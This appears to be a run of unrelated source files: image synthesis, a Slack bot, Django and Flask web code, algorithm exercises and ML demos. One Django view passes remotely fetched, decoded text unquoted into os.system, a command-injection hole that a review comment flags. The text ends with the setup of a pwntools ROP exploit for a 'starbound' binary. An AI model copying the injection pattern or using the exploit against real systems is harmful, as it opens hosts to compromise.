                n_image = n_image.crop((0,15, n_image.size[0], n_image.size[1] - 15))
                # preserve the glyph's aspect ratio at the chosen scale
                n_ratio = n_image.size[0] / n_image.size[1]
                new_width = int(scale*h*n_ratio)
                new_height = int(scale*h)
                n_image = n_image.resize((new_width, new_height), Image.ANTIALIAS)
                # evenly distribute glyphs across the staff, with jitter
                ulx = margin_left + margin_left_offset + int(j * w / num_neumes)
                uly = top_offset + int(0.33 * i * staff_width_orig*staff_scale) + int(-2*pos_offset + n_place*pos_offset) + random.randint(-5,5)
                lrx = ulx + new_width
                lry = uly + new_height
                # 4-TUPLE (IF PROVIDED) is left (ulx), upper (uly), right (lrx), and lower (lry) | first two coords if 2-TUPLE
                blank_image.paste(n_image, (ulx, uly))
                f.write(f'{ choice_type },{ ulx },{ uly },{ lrx },{ lry }\n')
    blank_image.save(save_image_path + f'page_{ timestamp }.png')
# print(w, h, pos_offset)
# blank_image.paste(neume_image, (random.randint(0,page_width), random.randint(0, page_height)))
# blank_image.show()
# cv2.waitKey()
|
# the notebook plugin
# handles notebook creation
import dateutil.parser
import logging
import json
import re
from docx import Document
from espresso.main import robot
from tinydb import where
# the regex used to identify an Announcement message
ANNOUNCEMENT_REGEX = r'(?is)Announcement for (?P<date>\d+/\d+/\d+): (?P<announcement>.*)'
# listen for an announcement
@robot.hear(ANNOUNCEMENT_REGEX)
def got_announcement(res):
    """Record an announcement heard in chat into the brain DB."""
    match = res.match
    when = dateutil.parser.parse(match.group('date'))
    body = match.group('announcement')
    author = res.msg.user.name
    # TODO: build a new brain api and refactor?
    logging.debug("Got Announcement for date %s: %s", when, body)
    res.robot.brain.db.insert({"plugin": "notebook", "type": "announcement",
                               "date": when.isoformat(), "announcement": body,
                               "user": author, "channel": res.msg.channel.name})
# backfill responder
@robot.respond(r'(?i)backfill announcements for (?P<date>\d+/\d+/\d+)')
def backfill_announcements(res):
    """Scan the #announcements channel history and store every announcement
    matching the requested date into the brain DB."""
    # pull out the target date from the backfill command
    target_date = dateutil.parser.parse(res.match.group('date'))
    # grab the entire history of #announcements (rather the last 100 messages) from Slack's api
    # this is a raw api call. refactor?
    channel_history = json.loads(res.robot.slack_client.api_call('channels.history',
        channel=res.robot.slack_client.server.channels.find("announcements").id,
        inclusive=1))
    # grab the messages from the history dict
    channel_message_type_events = channel_history['messages']
    # filter out only actual messages, not other subtypes
    channel_messages = filter(lambda m: ((m.get('type') == 'message') and ('subtype' not in m)), channel_message_type_events)
    # for every message in the history array
    for m in channel_messages:
        # check if it matches the announcement regex
        match = re.search(ANNOUNCEMENT_REGEX, m['text'])
        if match:
            # pull out a bunch of regex groups
            date = dateutil.parser.parse(match.group('date'))
            announcement = match.group('announcement')
            # grab the user's name from slackclient's user dict
            user = res.robot.slack_client.server.users.find(m['user']).name
            # if the date is the one the original backfill command specified
            if date == target_date:
                # insert the announcement into the db
                logging.debug("Got Announcement for date %s by user %s: %s",
                              date, user, announcement)
                res.robot.brain.db.insert({"plugin": "notebook", "type": "announcement",
                                           "date": date.isoformat(), "announcement": announcement,
                                           "user": user, "channel": 'announcements'})
# notebook creation responder
@robot.respond(r'(?i)make a (new )?notebook (entry|template) for (?P<date>\d+/\d+/\d+)')
def make_entry(res):
    """Build (or append to) the notebook .docx for a date from stored
    announcements, grouped by announcing user.

    Improvements: truthiness test instead of `!= []`, removed the dead
    `document = None` initialiser, hoisted the repeated deep config lookup.
    """
    # pull out the target notebook date from the regex
    date = dateutil.parser.parse(res.match.group('date'))
    logging.debug("new notebook target date: %s", date)
    # query the database for announcements from the specified date
    # TODO: build a new brain api and refactor?
    announcements = res.robot.brain.db.search((where('plugin') == 'notebook')
                                              & (where('type') == 'announcement')
                                              & (where('date') == date.isoformat()))
    logging.debug("announcements are %s", announcements)
    # if there actually _are_ announcements for that date
    if announcements:
        notebook_cfg = res.robot.config['plugin_config']['notebook']
        if notebook_cfg['append']:
            # append mode: extend the existing document
            document = Document(notebook_cfg['file'])
        else:
            # create a new docx document object
            document = Document()
        # fill in a bunch of boilerplate
        document.add_page_break()
        document.add_heading('{date}, the BEC'.format(date=date.strftime('%m/%d/%Y')), level=1)
        document.add_heading('Announcements:', level=2)
        # pull out the set of users that announced
        users = set(map(lambda a: a['user'], announcements))
        logging.debug("users are %s", users)
        for user in sorted(users):
            # resolve the slack handle to the member's real name
            real_name = res.robot.slack_client.server.users.find(user).real_name
            logging.debug("announcing user %s is %s", user, real_name)
            # heading paragraph for this user
            document.add_paragraph("{}:".format(real_name))
            # one bullet point per announcement by this user
            for announcement in announcements:
                if announcement['user'] == user:
                    document.add_paragraph("{}".format(announcement['announcement']),
                                           style='ListBullet')
        # TODO: onedrive
        document.save(notebook_cfg['file'])
    else:
        # let the user know that that meeting date doesn't exist
        res.reply(res.msg.user, "No announcements for date {}".format(date.strftime('%m/%d/%Y')))
|
# -*- coding: utf-8 -*-
from django.shortcuts import render,HttpResponseRedirect
from modelapp.models import Test,abc,ssr_1
from . import linux_shell,ping,tcp,ssr
from django.contrib.auth.models import auth,User
from django.contrib.auth.decorators import login_required
import requests,base64,os
last_port=1
ip='xx'
def code_haimianbaobao(s):
    """Shell out to the `myqr` CLI to render `s` as a QR code image.

    SECURITY NOTE(review): `s` is interpolated unquoted into a shell command,
    and callers pass it content fetched (then base64-decoded) from a remote
    URL -- untrusted input reaching os.system allows command injection.
    Consider subprocess.run with an argument list (shell=False) instead.
    """
    a = os.system('myqr '+s+' -p C:/Users/Administrator/Desktop/project/ssr_scr/erweima.jpg -d C:/Users/Administrator/Desktop/project/ssr_scr/static/ -n 1.png -c')
    print(a)  # exit status returned by os.system
def add_port(port):
    """Persist a port number as a new row of the ssr_1 table (Django ORM)."""
    ssr_1(name=str(port)).save()
def get_last_port():
    """Return the `name` of the most recently inserted ssr_1 row.

    Fix: the original bound its queryset to a local called `list`, shadowing
    the builtin.  Behaviour is unchanged (still raises IndexError if the
    table is empty).
    """
    names = [row.name for row in ssr_1.objects.all()]
    return names[-1]
@login_required(login_url='/login')  # page requires an authenticated session
def post(request):
    """Tools endpoint: run ping and tcp checks and render their results."""
    context = {}
    _ping = ping.ping()
    _tcp = tcp.tcp()
    # the helpers return raw command output; a '+' in it marks success
    if "+" in _ping:
        context['cping'] = 1
    else:
        context['cping'] = 0
    if "+" in _tcp:
        context['ctcp'] = 1
    else:
        context['ctcp'] = 0
    context['ping'] = _ping
    context['tcp'] = _tcp
    context['port'] = get_last_port()
    context['ping1'] = 'ping检测:'
    context['tcp1'] = 'tcp检测:'
    context['port1'] = '当前端口:'
    # fetch the current subscription, decode it, and render a QR code for it
    _t = requests.get('http://cnmf.net.cn/xx.html').text
    _t = base64.b64decode(_t).decode()
    code_haimianbaobao(_t)
    context['haimianbaobao'] = '/static/1.png'
    context['dy'] = _t
    context['dy1'] = '当前地址(订阅已自动更新:cnmf.net.cn/xx.html):'
    return render(request, 'a.html', context)
# Expected transcript of a successful firewall save + ShadowsocksR restart;
# referenced by post2 below when reporting whether the IP change succeeded.
text='iptables: Saving firewall rules to /etc/sysconfig/iptables: [ OK ]\r\niptables: Setting chains to policy ACCEPT: filter [ OK ]\r\niptables: Flushing firewall rules: [ OK ]\r\niptables: Unloading modules: [ OK ]\r\niptables: Applying firewall rules: [ OK ]\r\nIPv6 support\nstopped\nStopping ShadowsocksR success\nIPv6 support\nStarting ShadowsocksR success\n'
@login_required(login_url='/login')
def post2(request):
    """Rotate the server IP, record the new port, and refresh the
    subscription link / QR code."""
    context = {}
    _re = linux_shell.main()
    add_port(str(_re)[:6])
    # NOTE(review): `text == str(text)` compares the module constant with
    # itself and is therefore always True, so the failure branch below is
    # unreachable.  Presumably the shell output `_re` was meant to be checked
    # against the expected transcript `text` -- confirm intent before fixing.
    if text == str(text):
        context['cping'] = 1
        context['ping1'] = '更换成功!'
        ssr.main()
        # refresh subscription and regenerate the QR code
        _t = requests.get('http://cnmf.net.cn/xx.html').text
        _t = base64.b64decode(_t).decode()
        code_haimianbaobao(_t)
        context['haimianbaobao'] = '/static/1.png'
        context['dy'] = _t
        context['dy1'] = '当前地址(订阅已自动更新:cnmf.net.cn/xx.html):'
    else:
        context['cping'] = 0
        context['ping1'] = '更换失败!'
    context['ping'] = _re
    return render(request, 'a.html', context)
def post3(request):
    """Handle the login form POST; authenticates the fixed admin account.

    Fix: the original printed the submitted plaintext password to stdout --
    a credential leak into server logs; removed.
    """
    if request.method == 'POST':
        # username is intentionally fixed; only the password comes from the form
        name = 'admin1'
        pwd = request.POST.get('pwd')
        user = auth.authenticate(request, username=name, password=pwd)
        if user:
            auth.login(request, user)
            return HttpResponseRedirect('/')
    # GET requests and failed logins fall through to the login page
    return HttpResponseRedirect('login.html')
@login_required(login_url='/login')
def hello(request):
    """Landing page: fetch and decode the current subscription, regenerate
    its QR code, and render the dashboard."""
    raw = requests.get('http://cnmf.net.cn/xx.html').text
    decoded = base64.b64decode(raw).decode()
    code_haimianbaobao(decoded)
    ctx = {
        'dy': decoded,
        'haimianbaobao': '/static/1.png',
        'dy1': '当前地址(订阅已自动更新:cnmf.net.cn/xx.html):',
    }
    return render(request, 'a.html', ctx)
def login(request):
    """Render the login form page."""
    return render(request,'login.html')
from datetime import datetime
from packaging.version import parse as version_parse
from markupsafe import Markup
from flask import current_app
# //cdnjs.cloudflare.com/ajax/libs/moment.js/2.29.4/moment-with-locales.min.js
default_moment_version = '2.29.4'
default_moment_sri = ('sha512-42PE0rd+wZ2hNXftlM78BSehIGzezNeQuzihiBCvUEB3CVx'
'HvsShF86wBWwQORNxNINlBPuq7rG4WWhNiTVHFg==')
js_code = '''function flask_moment_render(elem) {{
const timestamp = moment(elem.dataset.timestamp);
const func = elem.dataset.function;
const format = elem.dataset.format;
const timestamp2 = elem.dataset.timestamp2;
const no_suffix = elem.dataset.nosuffix;
const units = elem.dataset.units;
let args = [];
if (format)
args.push(format);
if (timestamp2)
args.push(moment(timestamp2));
if (no_suffix)
args.push(no_suffix);
if (units)
args.push(units);
elem.textContent = timestamp[func].apply(timestamp, args);
elem.classList.remove('flask-moment');
elem.style.display = "";
}}
function flask_moment_render_all() {{
const moments = document.querySelectorAll('.flask-moment');
moments.forEach(function(moment) {{
flask_moment_render(moment);
const refresh = moment.dataset.refresh;
if (refresh && refresh > 0) {{
(function(elem, interval) {{
setInterval(function() {{
flask_moment_render(elem);
}}, interval);
}})(moment, refresh);
}}
}})
}}
document.addEventListener("DOMContentLoaded", flask_moment_render_all);'''
class moment(object):
    """Create a moment object.

    :param timestamp: The ``datetime`` object representing the timestamp.
    :param local: If ``True``, the ``timestamp`` argument is given in the
                  local client time. In most cases this argument will be set
                  to ``False`` and all the timestamps managed by the server
                  will be in the UTC timezone.
    """
    @classmethod
    def include_moment(cls, version=default_moment_version, local_js=None,
                       no_js=None, sri=None, with_locales=True):
        """Include the moment.js library and the supporting JavaScript code
        used by this extension.

        This function must be called in the ``<head>`` section of the Jinja
        template(s) that use this extension.

        :param version: The version of moment.js to include.
        :param local_js: The URL to import the moment.js library from. Use this
                         option to import the library from a locally hosted
                         file.
        :param no_js: Just add the supporting code for this extension, without
                      importing the moment.js library. Use this option if
                      the library is imported elsewhere in the template. The
                      supporting JavaScript code for this extension is still
                      included.
        :param sri: The SRI hash to use when importing the moment.js library,
                    or ``None`` if the SRI hash is unknown or disabled.
        :param with_locales: If ``True``, include the version of moment.js that
                             has all the locales.
        """
        mjs = ''
        # the known SRI hash only applies to the exact default CDN bundle
        if version == default_moment_version and local_js is None and \
                with_locales is True and sri is None:
            sri = default_moment_sri
        if not no_js:
            if local_js is not None:
                if not sri:
                    mjs = '<script src="{}"></script>\n'.format(local_js)
                else:
                    mjs = ('<script src="{}" integrity="{}" '
                           'crossorigin="anonymous"></script>\n').format(
                               local_js, sri)
            elif version is not None:
                if with_locales:
                    # the bundle was renamed in moment.js 2.8.0
                    js_filename = 'moment-with-locales.min.js' \
                        if version_parse(version) >= version_parse('2.8.0') \
                        else 'moment-with-langs.min.js'
                else:
                    js_filename = 'moment.min.js'
                if not sri:
                    mjs = ('<script src="https://cdnjs.cloudflare.com/ajax/'
                           'libs/moment.js/{}/{}"></script>\n').format(
                               version, js_filename)
                else:
                    mjs = ('<script src="https://cdnjs.cloudflare.com/ajax/'
                           'libs/moment.js/{}/{}" integrity="{}" '
                           'crossorigin="anonymous"></script>\n').format(
                               version, js_filename, sri)
        # (the ''' after the closing quote is an accidental empty-string
        # concatenation -- harmless)
        return Markup('{}\n<script>\n{}\n</script>\n'''.format(
            mjs, cls.flask_moment_js()))
    @staticmethod
    def locale(language='en', auto_detect=False, customization=None):
        """Configure the moment.js locale.

        :param language: The language code.
        :param auto_detect: If ``True``, detect the locale from the browser.
        :param customization: A dictionary with custom options for the locale,
                              as needed by the moment.js library.
        """
        if auto_detect:
            return Markup('<script>\nvar locale = '
                          'window.navigator.userLanguage || '
                          'window.navigator.language;\n'
                          'moment.locale(locale);\n</script>')
        if customization:
            return Markup(
                '<script>\nmoment.locale("{}", {});\n</script>'.format(
                    language, customization))
        return Markup(
            '<script>\nmoment.locale("{}");\n</script>'.format(language))
    @staticmethod
    def flask_moment_js():
        """Return the JavaScript supporting code for this extension.

        This method is provided to enable custom configurations that are not
        supported by ``include_moment``. The return value of this method is
        a string with raw JavaScript code. This code can be added to your own
        ``<script>`` tag in a template file::

            <script>
                {{ moment.flask_moment_js() }}
            </script>

        Alternatively, the code can be returned in a JavaScript endpoint that
        can be loaded from the HTML file as an external resource::

            @app.route('/flask-moment.js')
            def flask_moment_js():
                return (moment.flask_moment_js(), 200,
                        {'Content-Type': 'application/javascript'})

        Note: only the code specific to Flask-Moment is included. When using
        this method, you must include the moment.js library separately.
        """
        default_format = ''
        if 'MOMENT_DEFAULT_FORMAT' in current_app.config:
            default_format = '\nmoment.defaultFormat = "{}";'.format(
                current_app.config['MOMENT_DEFAULT_FORMAT'])
        return '''moment.locale("en");{}\n{}'''.format(default_format, js_code)
    @staticmethod
    def lang(language):
        """Set the language. This is a simpler version of the :func:`locale`
        function.

        :param language: The language code to use.
        """
        return moment.locale(language)
    def __init__(self, timestamp=None, local=False):
        # default to the current server-side UTC time
        if timestamp is None:
            timestamp = datetime.utcnow()
        self.timestamp = timestamp
        self.local = local
    def _timestamp_as_iso_8601(self, timestamp):
        """Serialise a datetime as ISO-8601, appending 'Z' for UTC timestamps."""
        tz = ''
        if not self.local:
            tz = 'Z'
        return timestamp.strftime('%Y-%m-%dT%H:%M:%S' + tz)
    def _render(self, func, format=None, timestamp2=None, no_suffix=None,
                units=None, refresh=False):
        """Build the placeholder <span> the client-side js_code renders.

        The moment.js function name and its arguments travel as data-*
        attributes; refresh is given to the browser in milliseconds.
        """
        t = self._timestamp_as_iso_8601(self.timestamp)
        data_values = 'data-function="{}"'.format(func)
        if format:
            data_values += ' data-format="{}"'.format(format)
        if timestamp2:
            data_values += ' data-timestamp2="{}"'.format(timestamp2)
        if no_suffix:
            data_values += ' data-nosuffix="1"'
        if units:
            data_values += ' data-units="{}"'.format(units)
        return Markup(('<span class="flask-moment" data-timestamp="{}" ' +
                       '{} data-refresh="{}" ' +
                       'style="display: none">{}</span>').format(
                           t, data_values, int(refresh) * 60000, t))
    def format(self, fmt=None, refresh=False):
        """Format a moment object with a custom formatting string.

        :param fmt: The formatting specification to use, as documented by the
                    ``format()`` function from moment.js.
        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("format", format=(fmt or ''), refresh=refresh)
    def fromNow(self, no_suffix=False, refresh=False):
        """Render the moment object as a relative time.

        This formatting option is often called "time ago", since it renders
        the timestamp using friendly text strings such as "2 hours ago" or
        "in 3 weeks".

        :param no_suffix: if set to ``True``, the time difference does not
                          include the suffix (the "ago" or similar).
        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("fromNow", no_suffix=int(no_suffix),
                            refresh=refresh)
    def fromTime(self, timestamp, no_suffix=False, refresh=False):
        """Render the moment object as a relative time with respect to a
        given reference time.

        This function maps to the ``from()`` function from moment.js.

        :param timestamp: The reference ``datetime`` object.
        :param no_suffix: if set to ``True``, the time difference does not
                          include the suffix (the "ago" or similar).
        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("from", timestamp2=self._timestamp_as_iso_8601(
            timestamp), no_suffix=int(no_suffix), refresh=refresh)
    def toNow(self, no_suffix=False, refresh=False):
        """Render the moment object as a relative time.

        This function renders as the reverse time interval of ``fromNow()``.

        :param no_suffix: if set to ``True``, the time difference does not
                          include the suffix (the "ago" or similar).
        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("toNow", no_suffix=int(no_suffix), refresh=refresh)
    def toTime(self, timestamp, no_suffix=False, refresh=False):
        """Render the moment object as a relative time with respect to a
        given reference time.

        This function maps to the ``to()`` function from moment.js.

        :param timestamp: The reference ``datetime`` object.
        :param no_suffix: if set to ``True``, the time difference does not
                          include the suffix (the "ago" or similar).
        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("to", timestamp2=self._timestamp_as_iso_8601(
            timestamp), no_suffix=int(no_suffix), refresh=refresh)
    def calendar(self, refresh=False):
        """Render the moment object as a relative time, either to current time
        or a given reference timestamp.

        This function renders relative time using day references such as
        tomorrow, next Sunday, etc.

        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("calendar", refresh=refresh)
    def valueOf(self, refresh=False):
        """Render the moment object as milliseconds from Unix Epoch.

        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("valueOf", refresh=refresh)
    def unix(self, refresh=False):
        """Render the moment object as seconds from Unix Epoch.

        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("unix", refresh=refresh)
    def diff(self, timestamp, units, refresh=False):
        """Render the difference between the moment object and the given
        timestamp using the provided units.

        :param timestamp: The reference ``datetime`` object.
        :param units: A time unit such as `years`, `months`, `weeks`, `days`,
                      `hours`, `minutes` or `seconds`.
        :param refresh: If set to ``True``, refresh the timestamp at one
                        minute intervals. If set to ``False``, background
                        refreshing is disabled. If set to an integer, the
                        refresh occurs at the indicated interval, given in
                        minutes.
        """
        return self._render("diff", timestamp2=self._timestamp_as_iso_8601(
            timestamp), units=units, refresh=refresh)
class Moment(object):
    """Flask extension glue: registers the `moment` helper class on the app
    and exposes it to all templates via a context processor."""
    def __init__(self, app=None):
        if app is not None:
            self.init_app(app)
    def init_app(self, app):
        # register under app.extensions and make `moment` available in Jinja
        if not hasattr(app, 'extensions'):  # pragma: no cover
            app.extensions = {}
        app.extensions['moment'] = moment
        app.context_processor(self.context_processor)
    @staticmethod
    def context_processor():
        # injects the `moment` class itself into the template context
        return {
            'moment': current_app.extensions['moment']
        }
    def flask_moment_js(self):
        # convenience passthrough to the registered class's static helper
        return current_app.extensions['moment'].flask_moment_js()
    def create(self, timestamp=None):
        # construct a moment instance for the given (or current) timestamp
        return current_app.extensions['moment'](timestamp)
|
from django.db import models
# Create your models here.
class CctvWorldInfo(models.Model):
    """World-news article scraped from CCTV."""
    # NOTE(review): default=0 on a CharField stores the int 0, not '' --
    # probably meant default='' or default='0'; confirm before migrating.
    news_id = models.CharField(max_length=50, default=0, verbose_name='新闻ID')
    url = models.CharField(max_length=500, default='', verbose_name='地址链接')
    front_image_url = models.CharField(max_length=500, default='', verbose_name='列表图片地址', blank=True, null=True)
    content_image_url = models.CharField(max_length=500, default='', verbose_name='内容图片地址', blank=True, null=True)
    title = models.CharField(max_length=200, default='', verbose_name='标题')
    summary = models.TextField(verbose_name='简介', default='')
    label = models.CharField(max_length=50, default='', verbose_name='标签')
    from_news = models.CharField(max_length=50, default='CCTV', verbose_name='来源')
    content = models.TextField(verbose_name='内容', default='')
    # release time kept as free text with a zeroed sentinel default
    release_time = models.CharField(max_length=200, default='0000-00-00 00:00:00')
    create_date = models.DateTimeField(auto_now=True, verbose_name="创建时间")
class TouTiaoNewsInfo(models.Model):
    """News article scraped from Toutiao."""
    # NOTE(review): default=0 on a CharField stores the int 0, not '' --
    # same concern as CctvWorldInfo.news_id above.
    news_id = models.CharField(max_length=50, default=0, verbose_name='新闻ID')
    url = models.CharField(max_length=500, default='', verbose_name='地址链接')
    front_image_url = models.CharField(max_length=500, default='', verbose_name='列表图片地址', blank=True, null=True)
    content_image_url = models.CharField(max_length=500, default='', verbose_name='内容图片地址', blank=True, null=True)
    title = models.CharField(max_length=200, default='', verbose_name='标题')
    label = models.CharField(max_length=50, default='', verbose_name='标签')
    from_news = models.CharField(max_length=50, default='', verbose_name='来源')
    content = models.TextField(verbose_name='内容', default='')
    comment = models.IntegerField(verbose_name='评论数', default=0)
    release_time = models.CharField(max_length=200, default='0000-00-00 00:00:00')
    create_date = models.DateTimeField(auto_now=True, verbose_name="创建时间")
|
import numpy as np
import timeit
from apr_max_sub_seq_test import measure_times, run_tests
# algorithm with double for loop and prices as list
def get_best_options_double_for(change_rates):
    """Naive O(n^2) baseline: best gain over all (buy, sell) index pairs.

    Prices are reconstructed from the change rates with an implicit starting
    price of 0; returns 0 for empty input or when no gain is possible.
    """
    if len(change_rates) == 0:
        return 0
    prices = [0] + np.cumsum(change_rates).tolist()
    best = 0
    for buy in range(len(prices)):
        for sell in range(buy, len(prices)):
            gain = prices[sell] - prices[buy]
            if gain > best:
                best = gain
    return best
# reverse for loop over prices
def jget_best_options_reversed_for(change_rates):
    """O(n) variant: walk the price list backwards, tracking the highest
    price still ahead; the best gain is (max future price - current price)."""
    if len(change_rates) == 0:
        return 0
    prices = [0] + np.cumsum(change_rates).tolist()
    best = 0
    highest_later = prices[-1]
    for price in reversed(prices):
        highest_later = max(highest_later, price)
        best = max(best, highest_later - price)
    return best
# reverse for loop over rates
def get_max_span(changes):
    """Kadane's algorithm directly on the change rates: maximum sum of any
    contiguous run of changes, floored at 0."""
    best = 0
    running = 0
    for delta in changes:
        running = running + delta if running > 0 else delta
        if running > best:
            best = running
    return best
def max_sub_seq_3_py(data):
    """Maximum contiguous sub-sequence sum (Kadane), floored at 0.

    Kept as a standalone duplicate of get_max_span so benchmark timings of
    each implementation remain independent.
    """
    best = running = 0
    for value in data:
        running = value if running <= 0 else running + value
        if best < running:
            best = running
    return best
def get_best_options_reversed_for(changes):
    """Single reverse pass over the change rates (no price list built).

    Walking backwards, `price` holds the price at each step *relative to the
    final price* (which is therefore 0), and `peak` tracks the highest such
    price among the later days; the answer is the best (peak - price) span.

    Bug fix: the original seeded the peak with `changes[-1]` -- a *change
    rate*, not a price -- which overstated the result (e.g. it returned 6
    instead of 3 for [3]) and raised IndexError on empty input.  The correct
    seed is the relative final price, 0.
    """
    span = 0
    price = 0
    peak = 0  # relative price of the last day
    for change in reversed(changes):
        price -= change
        if price > peak:
            peak = price
        if peak - price > span:
            span = peak - price
    return span
# run_tests(get_max_span)
# run_tests(get_best_options_reversed_for)
# measure_times(get_max_span)
# measure_times(get_best_options_reversed_for)
|
# Smallest positive number evenly divisible by every integer in 1..20
# (Project Euler problem 5).  The original brute-forced multiples of 10
# upward from 25200 with an inconsistent counter (its first pass only tested
# divisors 1..19 before resetting); since the true answer is a multiple of
# 10, it eventually printed the same value after ~20 million iterations.
# Replaced with a direct LCM computation -- identical printed output.
from math import gcd

number = 1
for divisor in range(1, 21):
    # lcm(a, b) = a * b // gcd(a, b)
    number = number * divisor // gcd(number, divisor)
print(number)
|
import random, time
class RandomBlocker:  # class name is the same as file name (plugin convention)
    """Board-game strategy: prefer an empty cell next to an opponent piece
    (a block), then one next to our own pieces, then any empty cell."""

    def __init__(self, empty, me, opponent):
        self.empty = empty        # marker used for an empty cell
        self.me = me              # this player's marker
        self.opponent = opponent  # opposing player's marker
        self.seed = time.time()   # deterministic per-move seed, bumped each play
        self.board = []           # 2-D grid, assigned externally before play()

    def play(self):
        """Pick and return the (x, y) coordinate of this move."""
        random.seed(self.seed)
        self.seed += 1
        slots, empties, blocks = self.readboard()
        if blocks:
            return random.choice(blocks)
        if slots:
            return random.choice(slots)
        return random.choice(empties)

    def surrounding(self, x, y):
        """Empty cells in the 3x3 neighbourhood of (x, y), clipped to the board.

        Bug fix: the original started the ranges at x-1 / y-1 without
        clamping at 0, so for cells on the top row or left column the index
        -1 silently wrapped around to the opposite edge of the board and
        returned negative coordinates.
        """
        coords = []
        endx = min(x + 2, len(self.board))
        endy = min(y + 2, len(self.board[0]))
        for i in range(max(x - 1, 0), endx):
            for j in range(max(y - 1, 0), endy):
                if self.board[i][j] == self.empty:
                    coords.append((i, j))
        return coords

    def readboard(self):
        """Classify cells: returns (adjacent-to-me, empty, adjacent-to-opponent).

        Assumes a square board (both axes use the row count).
        """
        slots, empties, blocks = [], [], []
        rng = range(len(self.board))
        for x in rng:
            for y in rng:
                if self.board[x][y] == self.me:
                    slots.extend(self.surrounding(x, y))
                elif self.board[x][y] == self.opponent:
                    blocks.extend(self.surrounding(x, y))
                else:
                    empties.append((x, y))
        return slots, empties, blocks
|
import tensorflow as tf
import numpy as np
## hidden size ##
## seq length ##
## batch_size ##
# TF1-style demo: run a single BasicLSTMCell over three one-hot-encoded
# character sequences and print the raw hidden-state outputs.
tf.set_random_seed(777)  # fixed global seed for reproducible weight init
# One-hot encodings for the 4-character vocabulary {h, e, l, o}.
h = [1, 0, 0, 0]
e = [0, 1, 0, 0]
l = [0, 0, 1, 0]
o = [0, 0, 0, 1]
# parameter #
hidden_size = 2       # LSTM state/output dimension
sequence_length = 5   # characters per sequence (informational; dynamic_rnn infers it)
batch_size = 3        # number of sequences (informational; dynamic_rnn infers it)
# RNN building #
cell = tf.contrib.rnn.BasicLSTMCell(num_units=hidden_size, state_is_tuple=True,
                                    reuse=tf.AUTO_REUSE)
x_data = np.array([[h, e, l, l, o],
                   [e, o, l, l, l],
                   [l, l, e, e, l]], dtype=np.float32)  # shape (3, 5, 4)
#print(x_data)
sess = tf.Session()
# Unrolls the cell over the time axis; outputs is presumably
# (batch, time, hidden) = (3, 5, 2) -- confirm against dynamic_rnn docs.
outputs, states = tf.nn.dynamic_rnn(cell, x_data, dtype=tf.float32)
sess.run(tf.global_variables_initializer())
print(sess.run(outputs))
sess.close()
#!/usr/bin/python
# -*- coding: cp936 -*-
import sqlite3
import csv
import xlrd
import xlwt
from SQLiteQuery.simTradeQuery import *
from SQLiteQuery.inertialTestersQuery import *
from SQLiteQuery.kcbActQuery import *
def getSimTradeSheetFromSQLite():
    """Export top simulated-trading users (excluding internal testers) from the
    SQLite database into ../output/simTradeResult.xls."""
    with sqlite3.connect('C:\sqlite\db\hxdata.db') as db:
        workbookdes = xlwt.Workbook()
        dst1 = workbookdes.add_sheet('sheet1')
        dst2 = workbookdes.add_sheet('sheet2')
        sq = simTradeQuery()
        # Top 30 mobile numbers by trading days -- 30 rather than the 10
        # finally kept, because internal testers still get filtered out below.
        topusers = sq.getTopSimTradeUsers(30)
        iq = inertialTestersQuery()
        inertialUsers = iq.getallInertialTestersMobile()
        kcb = kcbActQuery()
        kcbtopUsers = kcb.getTopSimTradeUsers(30)
        '''
        三、模拟交易用户
        1、N视界仿真账号的使用用户,取交易天数最多的前10名用户(提出内部人员)
        2、科创板大赛用户,取交易天数最多的前10名用户
        '''
        '''
        2
        '''
        dst2.write(0, 0, '科创版大赛用户')
        dst2.write(0, 1, '交易天数')
        finalTopUsers = {}
        count = 0
        row = 1
        # Keep the first 10 contest users that are neither internal testers
        # nor already recorded.
        for mobilephone in kcbtopUsers:
            if (mobilephone not in inertialUsers) and (mobilephone not in finalTopUsers):
                finalTopUsers[mobilephone] = kcbtopUsers[mobilephone]  # value = trading days
                dst2.write(row, 0, mobilephone)
                dst2.write(row, 1, kcbtopUsers[mobilephone])
                count = count + 1
                row = row + 1
            else:
                print(mobilephone, "is inertialUsers!")
            if count == 10:
                break
        workbookdes.save('../output/simTradeResult.xls')
        '''
        1
        '''
        '''
        dst1.write(0, 0, '模拟交易用户')
        dst1.write(0, 1, '模拟交易天数')
        finalTopUsers = {}
        count = 0
        row = 1
        for mobilephone in topusers:
            if (mobilephone not in inertialUsers) and (mobilephone not in finalTopUsers):
                finalTopUsers[mobilephone] = topusers[mobilephone] #tradedays
                dst1.write(row, 0, mobilephone)
                dst1.write(row, 1, topusers[mobilephone])
                count = count + 1
                row = row + 1
            else:
                print(mobilephone, "is inertialUsers!")
            if count == 10:
                break
        '''
getSimTradeSheetFromSQLite()
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import time
from pwn import *
context.log_level = 'debug'
elf = ELF('./starbound')
# Constants
O_RDONLY = 0
# Memory locations
# .bss
username = 0x80580d0
fp_array = 0x8058154
bin_sh = elf.bss() + 0x100
flag_path = elf.bss() + 0x108
buf = elf.bss() + 0x120
# ROP gadgets
add_esp_0x28_pop_ebx_ret = 0x08049bfe
